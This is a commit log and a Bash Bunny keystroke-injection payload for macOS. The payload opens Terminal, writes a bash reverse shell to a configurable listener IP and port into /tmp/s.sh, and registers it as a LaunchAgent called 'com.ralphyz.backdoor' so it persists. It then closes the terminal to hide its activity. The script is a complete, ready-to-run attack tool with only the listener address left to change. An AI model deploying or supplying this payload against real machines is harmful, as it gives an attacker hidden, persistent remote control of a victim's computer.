RalphyZ 750d384df7 Updated payloads for fw v1.1 (#176)
* Mac Reverse Shell

Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh.  It then runs the script in the background and closes the terminal window.

* Added variables for IP and Port of the Netcat Listener

For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener.  Change those values to your listener and no other edits should be needed.

* Added persistence (and a reason to have a dropper)

This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval.

* Mac Reverse Shell

Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh.  It then runs the script in the background and closes the terminal window.

* Added variables for IP and Port of the Netcat Listener

For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener.  Change those values to your listener and no other edits should be needed.

* Added persistence (and a reason to have a dropper)

This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval.

* Fixed additional MacReverseShell

* Added readme.md files

* Added readme.md files

* Added readme.md

* Added readme.md files

* Added readme.md files

* Updated for firmware 1.1

* Updated for firmware 1.1

* Added ThemeChanger and updated for firmware 1.1

* Updated readme.md

* Updated for firmware 1.1 - using RUN command

* Fixed issues with the new RUN - reverted

* Fixed a few script problems

* removed binary and updated readme.md

* added a check for themepack

* edited themechanger readme

* updated readme.md and version
2017-04-29 08:49:35 +10:00

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#!/bin/bash
#
# Title: RAZ_MacReverseShell
# Author: RalphyZ
# Version: 1.2
# Target: Mac OSX
# Dependencies: None
#
# Description: Starts a terminal window on a Mac,then creates a bash reverse
# shell inside a script, /tmp/s.sh. It then adds the script to the
# Launch Agent - establishing persistence - running at a
# user-defined interval
#
# Colors:
# | Status | Color | Description |
# | ---------- | ------------------------------| ------------------------------------------------ |
# | SETUP | Magenta solid | Setting attack mode, getting the switch position |
# | ATTACK | Yellow single blink | Running the VBScript |
# | FINISH | Green blink followed by SOLID | Script is finished |
#Magenta solid
LED SETUP
# Edit this to point to the NetCat Listener
LISTENER_IP="192.168.1.100"
LISTENER_PORT="4444"
# How often (in minutes) should this run from the Launch Agent
FREQUENCY="60"
#----Proceed with Caution------------------------------------------------------
# Human Interface Device
ATTACKMODE HID
# Emulate the Ducky - QUACK!
QUACK DEFAULT_DELAY 300
# Start the attack - yellow single blink
LED ATTACK
# Start the Mac Terminal
QUACK COMMAND SPACE
QUACK STRING terminal
QUACK DELAY 500
QUACK ENTER
# Give the terminal window a second to pop up
QUACK DELAY 1000
# Bash Reverse Shell into a script 's.sh'
QUACK STRING echo \"bash -i \>\& /dev/tcp/${LISTENER_IP}/${LISTENER_PORT} 0\>\&1\" \> /tmp/s.sh
QUACK ENTER
QUACK DELAY 500
# Change file permissions to allow execution
QUACK STRING chmod +x /tmp/s.sh
QUACK ENTER
QUACK DELAY 500
# Add to the Launch Agents
QUACK STRING printf \"\<plist version=\\\"1.0\\\"\>\<dict\>\<key\>Label\</key\>\<string\>com.ralphyz.backdoor\</string\>\<key\>ProgramArguments\</key\>\<array\>\<string\>/bin/sh\</string\>\<string\>/tmp/s.sh\</string\>\</array\>\<key\>RunAtLoad\</key\>\<true/\>\<key\>StartInterval\</key\>\<integer\>${FREQUENCY}\</integer\>\<key\>AbandonProcessGroup\</key\>\<true/\>\</dict\>\\n\</plist\>\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist
QUACK ENTER
QUACK DELAY 500
# Load the new Launch Agent - establishing persistence - and clear the terminal
QUACK STRING launchctl load com.ralphyz.backdoor.plist \&\& clear
QUACK ENTER
# Close the Terminal Window
QUACK COMMAND q
# Green 1000ms VERYFAST blink followed by SOLID
LED FINISH
exit 0